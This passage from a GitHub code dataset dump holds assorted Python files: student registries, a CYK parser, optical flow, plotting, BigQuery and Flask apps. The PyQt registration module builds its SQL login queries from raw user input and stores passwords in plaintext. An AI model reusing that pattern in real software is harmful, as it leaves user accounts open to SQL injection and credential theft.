'#homedecor', '#homeimprovement', '#furniture','#homecolor','#homestyling','#interiorforall','#roomdecor']\r\n\r\n # input_list = ['#cinema', '#acting', '#graphicdesign', '#fashion', '#architecture']\r\n input_list = []\r\n # input_list.apprnd()\r\n my_list.append(var1)\r\n my_list.append(var2)\r\n my_list.append(var3)\r\n result = []\r\n\r\n for i in range(0,len(hashtags)):\r\n if(hashtags[i] in input_list):\r\n result.append(1)\r\n else:\r\n result.append(0)\r\n\r\n return result","repo_name":"Kavisha4/13_HashConnect","sub_path":"python_model/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22937308477","text":"listdata=[]\nwhile True: #while 문은 들여쓰기,전체드래그후 탭)\n print('''\n =====================리스트 데이터 관리=====================\n 1. 리스트 추가 2.리스트 데이터 수정 3.리스트 데이터 삭제 4.종료\n ''')\n menu = int(input(\"메���를 선택해라\")) #숫자일경우 input 앞에 int\n\n if menu == 4 :\n break\n elif menu == 1 :\n data=input(\"추가할 데이터를 입력하세요\")\n listdata.append(data)\n print(listdata)\n elif menu == 2 :\n data=input(\"수정할 데이터를 입력하세요\")\n a=int(input(\"몇번째 데이터?\"))\n listdata[a-1]=data\n print(listdata)\n elif menu == 3 :\n a=int(input(\"몇번째 데이터?\"))\n del listdata[a-1]\n print(listdata)\n ","repo_name":"Aiden0626/kmove_python","sub_path":"basic/while_test.py","file_name":"while_test.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27867293043","text":"import os\nos.system('cls')\nalunos = []\nclass aluno:\n media = 0\n passou = False\n nome =\"\"\n def __init__(self,m,p,n):\n self.media = m\n self.passou = p\n self.nome = n\n def info(self):\n aprovacao = \"Aprovado\" if self.media >= 6 else \"Reprovado\"\n print(\"Aluno(a):\", self.nome, \"\\nMédia:\", str(self.media), \"\\nEle(a) está:\", str(aprovacao))\n print(\"------------------------\")\n\n\n\ndef Menu():\n print(\"1 - Cadastrar Novo Aluno\")\n print(\"2 - Listar Alunos\")\n print(\"3 - Informações do Aluno\")\n print(\"4 - Excluir aluno do cadastro\")\n print(\"5 - Listar todos alunos e informações \")\n print(\"6 - Sair\")\n opc = input(\"Dgite uma opção: \")\n return opc\n\n\ndef Novo_aluno():\n os.system('cls')\n n = input(\"Nome do Aluno: \")\n p = False\n m = input(\"Média do Aluno: \")\n al = aluno(int(m),p,n)\n alunos.append(al)\n print(\"Aluno cadastrado\")\n os.system(\"pause\")\n\n\n\ndef Informacoes():\n os.system('cls')\n a = input(\"Digite o numero do Aluno que deseja ver as informaçoes: \")\n try:\n alunos[int(a)].info()\n except:\n print(\"Aluno não existe no cadastro\")\n os.system(\"pause\")\n\n\n\ndef ExcluirAluno():\n os.system('cls')\n a = input(\"Digite o numero do Aluno que deseja excluir do cadastro: \")\n try:\n del alunos[int(a)]\n except:\n print(\"Aluno não existe no cadastro\")\n os.system(\"pause\")\n\n\ndef listarAlunos():\n os.system('cls')\n p = 0\n for i in alunos:\n print(str(p) + \" -\" , i.nome)\n p = p+1\n os.system(\"pause\")\n\n\ndef listartudo():\n os.system('cls')\n for i in alunos:\n i.info()\n os.system(\"pause\")\nret = Menu()\nwhile ret < \"6\":\n if ret == \"1\":\n Novo_aluno()\n elif ret == \"2\":\n listarAlunos()\n elif ret == \"3\":\n Informacoes()\n elif ret == \"4\":\n ExcluirAluno()\n elif ret == \"5\":\n listartudo()\n ret = Menu()\nos.system('cls')\nprint(\"Finalizando o programa....\\nPrograma finalizado!\")\n\n","repo_name":"GuilhermeFusari/ProjetosEstudo","sub_path":"Cadastro de Alunos.py","file_name":"Cadastro de Alunos.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15363589266","text":"import os\nimport subprocess as sp\nfrom unittest.mock import patch\n\nimport luigi\nfrom workflow.workflow import execute_command, ExtractLoadAirportData, DbtDeps, DbtSeedAirports, DbtRunAirports, ScrapeLoadArrivalData, DbtSeedArrivals, DbtRunAnalysis\n\ndef test_extract_load_airport_data_output():\n task = ExtractLoadAirportData()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '0_ExtractLoadAirportData.output'\n\ndef test_dbt_deps_output():\n task = DbtDeps()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '1_DbtDeps.output'\n\ndef test_dbt_seed_airports_output():\n task = DbtSeedAirports()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '2_DbtSeedAirports.output'\n\ndef test_dbt_run_airports_output():\n task = DbtRunAirports()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '3_DbtRunAirports.output'\n\ndef test_scrape_load_arrival_data_output():\n task = ScrapeLoadArrivalData()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '4_ScrapeLoadArrivalData.output'\n\ndef test_dbt_seed_arrivals_output():\n task = DbtSeedArrivals()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '5_DbtSeedArrival.output'\n\ndef test_dbt_run_analysis_output():\n task = DbtRunAnalysis()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '6_DbtRunAnalysis.output'\n\n@patch(\"workflow.workflow.execute_command\", return_value=\"Mocked output\")\ndef test_extract_load_airport_data_run(mocked_output):\n task = ExtractLoadAirportData()\n task.run()\n assert os.path.isfile(task.output().path)\n with open(task.output().path, \"r\") as f:\n assert f.read() == \"Mocked output\"\n os.remove(task.output().path)\n\n\n","repo_name":"1bk/simple-airports-analysis","sub_path":"tests/workflow/test_workflow.py","file_name":"test_workflow.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"8324599016","text":"import cv2\nimport numpy as np\n\ndef lucas_kanade_np(prvs, next, win=2):\n\n assert prvs.shape == next.shape\n\n im1 = np.zeros(prvs.shape[:2], dtype=np.uint8)\n\n if prvs.ndim == 3:\n im1 = cv2.cvtColor(prvs, cv2.COLOR_BGR2GRAY)\n else:\n im1[...] = prvs\n\n im2 = np.zeros(next.shape[:2], dtype=np.uint8)\n\n if next.ndim == 3:\n im2 = cv2.cvtColor(next, cv2.COLOR_BGR2GRAY)\n else:\n im2[...] = next\n\n I_x = np.zeros(im1.shape)\n I_y = np.zeros(im1.shape)\n I_t = np.zeros(im1.shape)\n I_x[1:-1, 1:-1] = (im1[1:-1, 2:] - im1[1:-1, :-2]) / 2\n I_y[1:-1, 1:-1] = (im1[2:, 1:-1] - im1[:-2, 1:-1]) / 2\n I_t[1:-1, 1:-1] = im1[1:-1, 1:-1] - im2[1:-1, 1:-1]\n params = np.zeros(im1.shape + (5,)) #Ix2, Iy2, Ixy, Ixt, Iyt\n params[..., 0] = I_x * I_x # I_x2\n params[..., 1] = I_y * I_y # I_y2\n params[..., 2] = I_x * I_y # I_xy\n params[..., 3] = I_x * I_t # I_xt\n params[..., 4] = I_y * I_t # I_yt\n del I_x, I_y, I_t\n cum_params = np.cumsum(np.cumsum(params, axis=0), axis=1)\n del params\n win_params = (cum_params[2 * win + 1:, 2 * win + 1:] -\n cum_params[2 * win + 1:, :-1 - 2 * win] -\n cum_params[:-1 - 2 * win, 2 * win + 1:] +\n cum_params[:-1 - 2 * win, :-1 - 2 * win])\n del cum_params\n op_flow = np.zeros(im1.shape + (2,))\n det = win_params[...,0] * win_params[..., 1] - win_params[..., 2] **2\n op_flow_x = np.where(det != 0, (win_params[..., 1] * win_params[..., 3] - win_params[..., 2] * win_params[..., 4]) / det, 0)\n op_flow_y = np.where(det != 0, (win_params[..., 0] * win_params[..., 4] - win_params[..., 2] * win_params[..., 3]) / det,0)\n op_flow[win + 1: -1 - win, win + 1: -1 - win, 0] = op_flow_x[:-1, :-1]\n op_flow[win + 1: -1 - win, win + 1: -1 - win, 1] = op_flow_y[:-1, :-1]\n\n return np.array(op_flow)","repo_name":"mcv-m6-video/mcv-m6-2018-team8","sub_path":"methods/LucasKanade.py","file_name":"LucasKanade.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31791088507","text":"\"\"\"\nPlot a lift curve, which shows the gain of the model compared to a random guess.\nImplements OneVsRest for multi-class classifications.\n\nInspired by https://www3.nd.edu/~busiforc/Lift_chart.html\n\"\"\"\n\nfrom typing import List, Tuple\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib.axes import Axes\nfrom matplotlib.ticker import PercentFormatter\nfrom sklearn.preprocessing import label_binarize\n\nfrom ml_tooling.metrics import lift_score\nfrom ml_tooling.utils import VizError, DataType\n\n\ndef plot_lift_curve(\n y_true: DataType,\n y_proba: DataType,\n title: str = None,\n ax: Axes = None,\n labels: List[str] = None,\n threshold: float = 0.5,\n) -> Axes:\n \"\"\"\n Plot a lift chart from results. Also calculates lift score based on a .5 threshold\n\n Parameters\n ----------\n y_true: DataType\n True labels\n\n y_proba: DataType\n Model's predicted probability\n\n title: str\n Plot title\n\n ax: Axes\n Pass your own ax\n\n labels: List of str\n Labels to use per class\n\n threshold: float\n Threshold to use when determining lift score\n\n Returns\n -------\n matplotlib.Axes\n \"\"\"\n\n if ax is None:\n fig, ax = plt.subplots()\n\n title = \"Lift Curve\" if title is None else title\n classes = np.unique(y_true)\n binarized_labels = label_binarize(y_true, classes=classes)\n\n if labels and len(labels) != len(classes):\n raise VizError(\n \"Number of labels must match number of classes: \"\n f\"got {len(labels)} labels and {len(classes)} classes\"\n )\n\n if binarized_labels.shape[1] == 1:\n # Binary classification case\n percents, gains = _cum_gain_curve(binarized_labels, y_proba[:, 1])\n score = lift_score(binarized_labels.ravel(), y_proba[:, 1] > threshold)\n ax.plot(percents, gains / percents, label=f\"$Lift = {score:.2f}$\")\n else:\n # Multi-class case\n for class_ in classes:\n percents, gains = _cum_gain_curve(\n binarized_labels[:, class_], y_proba[:, class_]\n )\n score = lift_score(\n binarized_labels[:, class_], y_proba[:, class_] > threshold\n )\n ax.plot(\n percents,\n gains / percents,\n label=f\"Class {labels[class_] if labels else class_} \"\n f\"$Lift = {score:.2f}$ \",\n )\n\n ax.axhline(y=1, color=\"grey\", linestyle=\"--\", label=\"Baseline\")\n ax.set_title(title)\n ax.set_ylabel(\"Lift\")\n ax.set_xlabel(\"% of Data\")\n formatter = PercentFormatter(xmax=1)\n ax.xaxis.set_major_formatter(formatter)\n ax.legend()\n return ax\n\n\ndef _cum_gain_curve(\n y_true: np.ndarray, y_proba: np.ndarray\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Calculate a cumulative gain curve of how many positives are captured\n per percent of sorted data.\n\n :param y_true:\n True labels\n\n :param y_proba:\n Predicted label\n\n :return:\n array of data percents and cumulative gain\n \"\"\"\n n = len(y_true)\n n_true = np.sum(y_true)\n\n idx = np.argsort(y_proba)[::-1] # Reverse sort to get descending values\n cum_gains = np.cumsum(y_true[idx]) / n_true\n percents = np.arange(1, n + 1) / n\n return percents, cum_gains\n","repo_name":"andersbogsnes/ml_tooling","sub_path":"src/ml_tooling/plots/lift_curve.py","file_name":"lift_curve.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"8447776854","text":"import MainMenuClass\nimport sqlite3\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nfrom AllConstants import *\n\n\nclass RegistrationClass(QWidget):\n def __init__(self):\n super().__init__()\n uic.loadUi('../AllActivities/registrationActivity.ui', self)\n self.setFixedWidth(XREGISTRSIZE)\n self.setFixedHeight(YREGISTRSIZE)\n self.setWindowTitle('Авторизация')\n\n self.db = sqlite3.connect('profiles_db.db')\n\n self.btn_registr.clicked.connect(self.Registrate)\n self.btn_avtoriz.clicked.connect(self.LoginToGame)\n\n self.db = sqlite3.connect('profiles_db.db')\n self.cursor = self.db.cursor()\n\n def Registrate(self):\n Opened = True\n self.lbl_error_value.setText('')\n allLogins = self.cursor.execute(f''' SELECT login FROM allLogins WHERE login = '{self.ledit_login.text()}' ''').fetchall()\n if len(allLogins) != 0:\n Opened = False\n if self.ledit_login.text() != '' and len(self.ledit_password.text()) >= 8 and Opened:\n query = f''' INSERT INTO allLogins (login, password) VALUES('{self.ledit_login.text()}', '{self.ledit_password.text()}') '''\n self.cursor.execute(query)\n self.db.commit()\n self.menu = MainMenuClass.MainMenuInit(self.ledit_login.text())\n self.menu.show()\n self.hide()\n\n query = f''' INSERT INTO profiles (login, status, nickname, bestRecord)\n VALUES('{self.ledit_login.text()}', 'Нет', '{self.ledit_login.text()}', 0) '''\n self.cursor.execute(query)\n self.db.commit()\n\n # тут происходит запись всех рекордов в игре\n recordwriting = open(f'../allCSVFiles/records_{self.ledit_login.text()}.csv', 'w', encoding='utf8')\n for i in range(3, 9):\n for j in range(3, 9):\n recordwriting.write(';'.join([str(i), str(j), '0', '\\n']))\n elif not Opened:\n errorWindow = QMessageBox()\n errorWindow.setIcon(QMessageBox.Critical)\n errorWindow.setWindowTitle(\"ошибка регистрации\")\n errorWindow.setText('данный логин уже занят')\n errorWindow.exec_()\n else:\n errorWindow = QMessageBox()\n errorWindow.setIcon(QMessageBox.Critical)\n errorWindow.setWindowTitle(\"ошибка регистрации\")\n errorWindow.setText('некорректный логин или пароль')\n errorWindow.exec_()\n\n\n def LoginToGame(self):\n self.lbl_error_value.setText('')\n query = f''' SELECT * FROM allLogins WHERE login = '{self.ledit_login.text()}' '''\n resourses = self.cursor.execute(query).fetchall()\n windowOpened = True\n for i in resourses:\n if i[1] == self.ledit_password.text():\n self.db.close()\n self.menu = MainMenuClass.MainMenuInit(self.ledit_login.text())\n self.menu.show()\n self.hide()\n windowOpened = False\n if windowOpened:\n errorWindow = QMessageBox()\n errorWindow.setIcon(QMessageBox.Critical)\n errorWindow.setWindowTitle(\"ошибка входа\")\n errorWindow.setText('неверный логин или пароль')\n errorWindow.exec_()\n","repo_name":"AmirHai/project_2048","sub_path":"AllClasses/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16169658575","text":"import os\nimport argparse\nfrom typing import List, Union\n\nfrom nltk.tree import Tree\nfrom nltk.grammar import CFG, Production, Nonterminal \n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--grammar_file',\n default=\"/home/pavlo/comp-550/comp-550-a2/input/grammar_fr.txt\", \n help='Grammar file.')\n args = parser.parse_args()\n\n return args\n\n\nclass CYK:\n\n def __init__(self, cfg: CFG) -> None:\n assert(isinstance(cfg, CFG)), \"grammar must be of type nltk.CFG\"\n self.cfg = cfg\n self.cfg_nonterminals = {p.lhs().symbol() for p in cfg.productions()}\n # self.cfg_unary_productions = {p for p in cfg.productions() \n # if (p.rhs()) == 1 and \n # p.rhs().sybol() in self.cfg_nonterminals}\n self.cnf = to_cnf(cfg)\n\n def parse(self, sentence: Union[str, List[str]], keep_cnf: bool=False) -> List[Tree]:\n words = sentence if isinstance(sentence, list) else sentence.split()\n\n table = [[[] for _ in range(len(words)+1)] for _ in range(len(words))]\n\n for j in range(1, len(words)+1):\n for production in self.cnf.productions(rhs=words[j-1]):\n table[j-1][j].append((production,))\n for i in range(j-2, -1, -1):\n for k in range(i+1, j):\n for production in self.cnf.productions():\n if production.is_nonlexical():\n B = production.rhs()[0]\n C = production.rhs()[1]\n if (B in [x[0].lhs() for x in table[i][k]] and \n C in [x[0].lhs() for x in table[k][j]]):\n table[i][j].append((production, k))\n # for t in table:\n # print(t)\n return self.build_trees(table=table, keep_cnf=keep_cnf)\n \n def build_trees(self, table: List, keep_cnf: bool) -> List:\n # check if we can retrieve at least one parse tree\n top_right_cell_lhs = [x[0].lhs() for x in table[0][-1]]\n if self.cnf.start() not in top_right_cell_lhs:\n return [] # not able to parse the sentence\n \n def move(back_ptr, i, j, pop=False):\n if len(back_ptr) == 1: # lexical production\n production = back_ptr[0]\n return Tree(\n node=production.lhs().symbol(), \n children=[production.rhs()[0]])\n else: # unlexical productions\n k = back_ptr[-1]\n\n left_back_ptrs = [x for x in table[i][k] \n if x[0].lhs() == back_ptr[0].rhs()[0]]\n right_back_ptrs = [x for x in table[k][j] \n if x[0].lhs() == back_ptr[0].rhs()[1]]\n if not pop:\n if len(right_back_ptrs) > 1 and len(right_back_ptrs[0]) > 1:\n table[k][j].remove(right_back_ptrs[0])\n elif len(left_back_ptrs) > 1 and len(left_back_ptrs[0]) > 1:\n table[i][k].remove(left_back_ptrs[0])\n subtree = Tree(\n node=back_ptr[0].lhs().symbol(),\n children=[move(left_back_ptrs[0], i, k, pop), \n move(right_back_ptrs[0], k, j, pop)])\n \n return subtree\n\n trees = []\n start = self.cnf.start()\n table[0][-1] = [x for x in table[0][-1] if x[0].lhs() == start]\n\n while True:\n production = table[0][-1][0]\n \n tree = Tree(\n node=start.symbol(), \n children=move(production, 0, len(table[0])-1))\n if tree in trees:\n break\n trees.append(tree)\n\n # Convert from CNF to original grammar format\n if not keep_cnf:\n trees = [self.to_cfg(tree) for tree in trees]\n\n # keep unique trees\n unique_trees = []\n while trees:\n tree = trees.pop()\n if tree not in unique_trees:\n unique_trees.append(tree)\n\n return unique_trees\n \n def to_cfg(self, tree):\n # change root label to original start\n tree.set_label(self.cfg.start().symbol())\n\n def traverse(subtree):\n root = subtree.label()\n production = Production(\n lhs=Nonterminal(root), \n rhs=[Nonterminal(child.label()) if isinstance(child, Tree) else child for child in subtree])\n if len(subtree) == 1: # terminal node\n if production not in self.cfg.productions():\n node = subtree.label()\n child = subtree[0]\n child_symbol = Nonterminal(child.label()) if isinstance(child, Tree) else child\n candidate = [x for x in self.cfg.productions(rhs=child_symbol) if len(x) == 1][0]\n intermediate = [x for x in self.cfg.productions(rhs=candidate.lhs()) if len(x) == 1]\n\n subtree = Tree(node=node, children=[Tree(node=intermediate[0].rhs()[0].symbol(), children=[child])])\n return traverse(subtree)\n return subtree\n else: \n if production not in self.cfg.productions():\n children = []\n for child in subtree:\n label = child.label()\n if label not in self.cfg_nonterminals:\n for grandchild in child:\n children.append(grandchild)\n else:\n children.append(child)\n subtree = Tree(node=root, children=children)\n return Tree(node=root, children=[traverse(child) if isinstance(child, Tree) else child for child in subtree])\n\n tree = traverse(tree)\n return tree\n\n\ndef to_cnf(cfg: CFG) -> CFG:\n \"\"\" Takes a CFG and returns its CNF.\n Four cases are handled here:\n 0. Make sure start non-terminal is never on the RHS\n 1. Productions that mix terminals and non-terminals on the RHS.\n 2. Productions that with a single non-terminal on the RHS.\n 3. Productions with len(RHS) > 2\n \"\"\"\n if cfg.is_chomsky_normal_form():\n # no modification is required\n return cfg\n\n # 0. Make sure start non-terminal is never on the RHS\n cfg = validate_start(cfg)\n # Case 1. Productions that mix terminals and non-terminals on the RHS.\n cfg = un_mix_rhs(cfg)\n # 2. Productions that with a single non-terminal on the RHS.\n cfg = remove_unary_productions(cfg)\n # 3. Productions with len(RHS) > 2\n cfg = make_binary_productions(cfg)\n\n assert cfg.is_chomsky_normal_form(), \"ERROR: CFG is still not in CNF.\"\n\n return cfg\n\n\ndef validate_start(cfg: CFG) -> CFG:\n start = cfg.start()\n\n for production in cfg.productions():\n if start in production.rhs():\n new_start = Nonterminal(\"_ROOT_\")\n new_production = Production(lhs=new_start, rhs=[start])\n cfg = CFG(\n start = new_start,\n productions = cfg.productions() + [new_production]\n )\n return cfg\n\n\ndef un_mix_rhs(cfg, terminal_pad:str='#') -> CFG:\n start = cfg.start()\n productions = set()\n\n for production in cfg.productions():\n if production.is_lexical() and len(production.rhs()) > 1: \n # Change terminals with non-terminals and add lexical productions\n # with len(RHS) == 1\n rhs = []\n for rhs_item in production.rhs():\n if isinstance(rhs_item, Nonterminal):\n rhs.append(rhs_item)\n else:\n non_terminal = Nonterminal(symbol=terminal_pad + rhs_item.upper())\n rhs.append(non_terminal)\n productions.add(Production(lhs=non_terminal, rhs=[rhs_item])) \n productions.add(Production(lhs=production.lhs(), rhs=rhs))\n else:\n productions.add(production)\n \n return CFG(start=start, productions=productions)\n\n\ndef remove_unary_productions(cfg: CFG)-> CFG:\n unary_productions = set()\n non_unary_productions = set()\n\n for production in cfg.productions():\n if production.is_lexical() or len(production) > 1:\n non_unary_productions.add(production)\n else:\n unary_productions.add(production)\n\n while unary_productions:\n unary_production = unary_productions.pop()\n unary_lhs = unary_production.lhs()\n unary_rhs = unary_production.rhs()[0]\n for production in cfg.productions(lhs=unary_rhs):\n merged_production = Production(lhs=unary_lhs, rhs=production.rhs())\n \n if merged_production.is_lexical() or len(merged_production) > 1:\n non_unary_productions.add(merged_production)\n else:\n unary_productions.add(merged_production)\n \n return CFG(cfg.start(), productions=non_unary_productions)\n\n\ndef make_binary_productions(cfg: CFG)-> CFG:\n valid_productions = set()\n invalid_productions = set()\n\n for production in cfg.productions():\n if (production.is_lexical() or (production.is_nonlexical() and len(production) == 2)):\n valid_productions.add(production)\n else:\n invalid_productions.add(production)\n \n while invalid_productions:\n invalid_production = invalid_productions.pop()\n lhs = invalid_production.lhs()\n rhs_first = invalid_production.rhs()[0]\n rhs_rest = invalid_production.rhs()[1:]\n new_non_terminal = Nonterminal(\n symbol='<' + lhs.symbol() + '-' + rhs_first.symbol() + '>')\n new_production = Production(\n lhs=invalid_production.lhs(), \n rhs=[rhs_first, new_non_terminal])\n valid_productions.add(new_production)\n new_non_terminal_production = Production(\n lhs=new_non_terminal, rhs=rhs_rest)\n if len(new_non_terminal_production) == 2:\n valid_productions.add(new_non_terminal_production)\n else:\n invalid_productions.add(new_non_terminal_production)\n \n return CFG(start=cfg.start(), productions=valid_productions)\n\n\ndef main():\n args = parse_args()\n\n with open(args.grammar_file) as f:\n cfg = f.read()\n \n cfg = CFG.fromstring(cfg)\n\n cyk = CYK(cfg=cfg)\n\n # res = cyk.parse(\"I shot the elephant in my pyjamas\")\n # res = cyk.parse(\"I shot an elephant in my pajamas\")\n # res = cyk.parse(\"Mary saw Bob\")\n # res = cyk.parse(\"the dog saw a man in the park\")\n # res = cyk.parse(\"the angry bear chased the frightened little squirrel\")\n # res = cyk.parse(\"Chatterer said Buster thought the tree was tall\")\n sentences_file = \"/home/pavlo/comp-550/comp-550-a2/input/sentences.txt\"\n with open(sentences_file) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\n\n # res = cyk.parse(\"le chat mange le poisson\")\n for line in lines:\n res = cyk.parse(line)\n \n print(f\"{line} : {len(res)}\")\n\n # for r in res:\n # r.pretty_print()\n\nif __name__ == \"__main__\":\n main()","repo_name":"paul-ruban/comp-550","sub_path":"comp-550-a2/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16494274384","text":"import math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n n = int(input())\r\n res=0\r\n maxcount=0\r\n\r\n while n>0:\r\n if n%2==1:\r\n res+=1\r\n if res>maxcount:\r\n maxcount=res\r\n \r\n else:\r\n res=0\r\n \r\n n//=2\r\n print(maxcount)\r\n","repo_name":"NikhilHariharan/NikhilHariharan","sub_path":"Day10.py","file_name":"Day10.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26503185967","text":"\nimport socket\n\nfrom fluxmonitor.config import MAINBOARD_ENDPOINT, HEADBOARD_ENDPOINT\n\n\ndef create_mainboard_socket():\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n try:\n s.connect(MAINBOARD_ENDPOINT)\n except Exception:\n s.close()\n raise\n\n return s\n\n\ndef create_toolhead_socket():\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n try:\n s.connect(HEADBOARD_ENDPOINT)\n except Exception:\n s.close()\n raise\n\n return s\n","repo_name":"flux3dp/delta-firmware","sub_path":"fluxmonitor/player/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"27052532350","text":"from dq0.sdk.data.sql.sql import SQL\n\ntry:\n from google.cloud import bigquery\n big_query_available = True\nexcept ImportError:\n big_query_available = False\n\n\nclass BigQuery(SQL):\n \"\"\"Data Source for BigQuery data.\n\n Provides function to read in BigQuery data.\n\n Args:\n connection_string (:obj:`str`): The BigQuery project.\n \"\"\"\n\n def __init__(self, connection_string):\n super().__init__(connection_string)\n self.type = 'bigquery'\n\n def execute(self, query, **kwargs):\n \"\"\"Execute SQL query\n\n Args:\n query: SQL Query to execute\n kwargs: keyword arguments\n\n Returns:\n SQL ResultSet as pandas dataframe\n \"\"\"\n # check query\n if query is None:\n raise ValueError('you need to pass a query parameter')\n\n # Construct a BigQuery client object.\n if not big_query_available:\n raise ImportError('big_query dependencies must be installed first')\n\n self.client = bigquery.Client()\n\n # make an API request\n query_job = self.client.query(query)\n\n # waits for query to complete\n query_job.result()\n\n # get the destination table for the query results\n destination = query_job.destination\n\n # Get the schema (and other properties) for the destination table.\n destination = self.client.get_table(destination)\n\n # details: https://github.com/googleapis/python-bigquery/blob/35627d145a41d57768f19d4392ef235928e00f72/google/cloud/bigquery/client.py\n rows = self.client.list_rows(\n destination,\n selected_fields=None,\n max_results=None,\n page_token=None,\n start_index=None,\n page_size=None,\n )\n\n # either create temporary table or return result set as dataframe\n df = rows.to_dataframe(create_bqstorage_client=False)\n\n # return pandas dataframe\n return df\n","repo_name":"gradientzero/dq0-sdk","sub_path":"dq0/sdk/data/sql/big_query.py","file_name":"big_query.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23654411366","text":"from photo import Photo\nfrom signal import pause\nfrom time import sleep\nfrom gpiozero import LED, Button\n\n# Read the configuration\nexec(open('config.py').read())\n\n\nprint(\"Welcome to Python on Docker (print)\")\n\nled_green = LED(PIN_LIGHT_GREEN)\nled_yellow = LED(PIN_LIGHT_YELLOW)\nled_red = LED(PIN_LIGHT_RED)\nled_flash = LED(PIN_LIGHT_FLASH)\n#\n# while True:\n# led.on()\n# print('Light on')\n# sleep(1)\n# led.off()\n# print('Light off')\n# sleep(1)\n\n\n# Read the configuration\nexec(open('./config.py').read())\n\n# Project version number\n__version__ = '0.0.1'\n\n\ndef led_on():\n print(\"On!\")\n led_green.on()\n led_yellow.on()\n led_red.on()\n led_flash.on()\n\n\ndef led_off():\n print(\"Off!\")\n led_green.off()\n led_yellow.off()\n led_red.off()\n led_flash.off()\n\n\nbutton = Button(PIN_BUTTON)\nbutton.when_pressed = led_on\nbutton.when_released = led_off\n\n# image = Photo(PIN_OUTPUT_A, PIN_LIGHT_RED)\n# print(image.file_name)\n\npause()\n","repo_name":"vergissberlin/phart","sub_path":"app/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70318408168","text":"from flask import Flask,render_template,request\nimport csv\nimport pandas as pd\n\napp = Flask(__name__)\n\nclass Students:\n\n def Register(self, studentID, studentName, gender, dob, city, state, studentEmail, qualification, stream):\n self.studentID=studentID\n self.studentName=studentName\n self.gender=gender\n self.dob=dob\n self.city=city\n self.state=state\n self.studentEmail=studentEmail\n self.qualification=qualification\n self.stream=stream\n with open('students.csv', mode='a',newline='') as students:\n colleges_writer = csv.writer(students, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n colleges_writer.writerow([self.studentID,self.studentName,self.gender,self.dob,self.city,self.state,self.studentEmail,self.qualification, self.stream])\n\n def Display(self):\n clg = pd.read_csv('students.csv', header=None,names=['Student_ID', 'Student_Name', 'Gender', 'DoB', 'City', 'State', 'Student_Email','Qualification', 'Stream'])\n clg.set_index('Student_ID')\n return clg\n\n\n def Filter(self, id):\n self.id=id\n list=[self.id]\n clg = pd.read_csv('students.csv', header=None, names=['Student_ID', 'Student_Name', 'Gender', 'DoB', 'City', 'State', 'Student_Email','Qualification', 'Stream'])\n clg.set_index('Student_ID')\n return clg[clg.Student_ID.isin(list)]\n # return clg.values.tolist()\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"POST\":\n studentID = request.form['id']\n studentName = request.form['name']\n gender = request.form['gender']\n dob = request.form['dob']\n city = request.form['city']\n state = request.form['state']\n studentEmail = request.form['email']\n qualification = request.form['qualification']\n stream = request.form['stream']\n clgreg = Students()\n clgreg.Register(studentID,studentName,gender,dob,city,state,studentEmail,qualification,stream)\n return render_template(\"index.html\", alert='Student ID '+studentID+' Successfully Registered!')\n return render_template(\"add_student.html\")\n\n@app.route(\"/display\", methods=[\"GET\", \"POST\"])\ndef display():\n clgdel = Students()\n try:\n x = clgdel.Display()\n except(FileNotFoundError):\n return render_template(\"display.html\", info=\"No record.\")\n return render_template(\"display.html\", column_names=x.columns.values, row_data=list(x.values.tolist()))\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef filter_display():\n if request.method == \"POST\":\n studentID=request.form['studentId']\n clgfilt=Students()\n try:\n x=clgfilt.Filter(studentID)\n except(FileNotFoundError):\n return 